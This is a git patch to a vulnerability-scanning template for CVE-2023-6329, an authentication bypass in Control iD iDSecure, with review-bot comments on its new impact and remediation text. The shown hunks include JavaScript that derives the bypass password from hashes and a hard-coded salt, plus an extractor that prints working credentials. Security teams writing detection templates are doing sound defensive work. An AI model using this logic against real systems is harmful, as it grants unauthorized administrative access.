From c34971a3b2cd49053b73d57bd28fabddaffb50d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 5 Sep 2024 11:12:52 +0700 Subject: [PATCH] Update CVE-2023-6329.yaml --- http/cves/2023/CVE-2023-6329.yaml | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-6329.yaml b/http/cves/2023/CVE-2023-6329.yaml index 16f3d347c3..fc141e35ee 100644 --- a/http/cves/2023/CVE-2023-6329.yaml +++ b/http/cves/2023/CVE-2023-6329.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user. + impact: | + Successful exploitation could allow an attacker to bypass authentication controls. + remediation: | + Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,7 +24,7 @@ info: vendor: controlid product: idsecure fofa-query: body="iDSecure" - tags: cve,cve2023,auth-bypass,idsecure,control-id + tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive variables: username: "{{rand_base(8)}}" @@ -36,17 +40,16 @@ flow: | javascript: - code: | - var passwordRandom = passwordRandom; - var sha1Hash = template.sha1Hash; - var sha256Hash=(sha256combined.substring(0,6)) - var passwordCustom = parseInt(sha256Hash, 16).toString(); - passwordCustom + var passwordRandom = passwordRandom; + var sha1Hash = template.sha1Hash; + var sha256Hash=(sha256combined.substring(0,6)) + var passwordCustom = parseInt(sha256Hash, 16).toString(); + passwordCustom args: sha1Hash: "{{sha1Hash}}" sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}" passwordRandom: "{{passwordRandom}}" - http: - raw: - | 
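Review bot: The new `impact` text in the info block is weaker than the description directly above it, which says the attacker can act as an administrative user, while the added field stops at bypassing authentication controls. Something like `Successful exploitation lets an unauthenticated attacker authenticate as an administrative user of iDSecure.` would keep the two consistent. The `remediation` line refers to a firmware version, but the description names iDSecure v4.7.32.0 and iDS-Core.dll, which reads as installed software rather than device firmware; `Update iDSecure to a vendor release that fixes CVE-2023-6329.` avoids the mismatch. The fixed version is not stated anywhere in this patch, so it should come from the vendor advisory rather than be guessed.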
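Review bot: The `intrusive` tag is added on the tags line, but nothing in the info block says what the template changes on the target. The extractor at the end of the file emits `USER:` and `PASS:` values, and `username` is a random variable, so the run presumably leaves a new account behind; the request that would create it is outside these hunks. A sentence in `description` such as `This template creates an account on the target; remove it after the scan and treat the extracted credentials as sensitive.` would tell operators what to clean up and that the scan output holds working credentials.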
@@ -114,4 +117,4 @@ http: - type: dsl dsl: - '"USER: "+ username' - - '"PASS: "+ password' + - '"PASS: "+ password'